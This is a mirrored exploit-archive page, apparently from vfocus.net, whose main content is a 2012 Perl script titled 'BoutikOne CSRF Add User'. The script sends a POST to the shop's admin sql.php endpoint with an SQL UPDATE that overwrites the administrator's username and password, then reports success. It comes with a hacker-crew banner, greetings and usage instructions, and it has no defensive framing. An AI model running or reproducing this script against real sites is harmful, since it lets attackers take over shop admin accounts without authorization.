BoutikOne CSRF Add User Vulnerability

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

BoutikOne CSRF Add User Vulnerability

来源：vfocus.net 作者：GarA 发布时间：2012-07-03

#!/usr/bin/perl -w
# Exploit Title: BoutikOne CSRF Add User
# Exploit Author: GarA
# Vendor Homepage: www.boutikone.com
# Tested on: Win Xp sp3
system ("color a");
system ("cls");
$num_args = $#ARGV + 1;
if ($num_args != 4) {
print "            :MM:....:HMMM                   .MMMMMMMMMM.                                             \n";
print "   .M    ..                MM.             M.      :MMMMH                            \n";
print "    M M                       MH        .MM           M                        \n"       ;
print "    .M HM                       M:     MMMMMMH                              \n"           ;
print "     HM MMH                     :M   MMMMMMMMMMMH                            \n"          ;
print "    .M MMMMMMM:                  .     .MMMMMMMMMMM.                         \n"           ;
print "   M MMMM :MMMMMMMMH H            M          MMMMMMMM:                       \n"            ;
print "      MMM . :MMMMMMMM             M              MMMMMM                      \n"             ;
print "   M HMM H MM HMMMMM              M.               MMMMM                    \n"               ;
print " .:   .M H.: MMHMM              M                 .MMM                      \n"              ;
print "    .   .MM   MM M:               M                  :MMH    MMMMM   M. HMMM   HMMMM    .M. .M    MH   \n";
print "   ..    :MMMM:   .M               .                   MM. HMH   :. MMM. .M MM    MH .MM MMM :M:   \n" ;
print "     H   : :MMH                  M                   .MM   MH       .MM    .   MMMM :M. MM MHM MM     \n" ;
print "      MM   HM:    :             HM                    MM    M        .MH           .MMM: MM M..M.:M:    \n"   ;
print "       HM:    .MMM            :M                     MM     MM    :H .MH      MM     MM   .MMM MMMM     \n"    ;
print "         MMMMHHMM          :MH                      M        HMMMMH   MH        MMMMM      MM   .MM    \n" ;
print " \n";
print "\n BoutikOne CSRF Add User \n";
print "\nUsage: $0 www.site.com admin-path user password \n";
print ("=========================================\n");
print (" Exploit discovered & coded by GarA \n");
print " Gr33tz to : Dr.Sayr0s , Dr.BiLLi , Last Breath \n";
print " Dr.Milas , O-Snip3r , Ev!l Code , P4L-T3RRORIST \n";
print " Mr NoRvI , Dr.s@3d , Mr MeGa , ViRuS_PaL \n";
print " Mafia Hack Team & Scr3w & Arhack.net ";
exit;
}

$site=$ARGV[0];
$admn=$ARGV[1];
$usr=$ARGV[2];
$pass=$ARGV[3];
use LWP::UserAgent;
$ua = new LWP::UserAgent;
$ua->agent("AgentName/0.1 " . $ua->agent);
my $req = new HTTP::Request POST => 'http://' . $site . '/'. $admn . '/sql.php';
$req->content_type('application/x-www-form-urlencoded');
$req->content('request=UPDATE+admin+SET+motdepasse+%3D+%27' . $pass .'%27+%2C+admin+%3D+%27' . $usr . '%27+WHERE+ID+%3D+1');

my $res = $ua->request($req);

if ($res->content =~ /SQL exйcutйe avec succ/ )
{
print ("Don3 ~\n");
print ("usr :" . $usr . "\n");
print ( "pwd :" . $pass . "\n");
print ("3nj0y \n");
}
else
{
print "Faild :s \n";

}

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告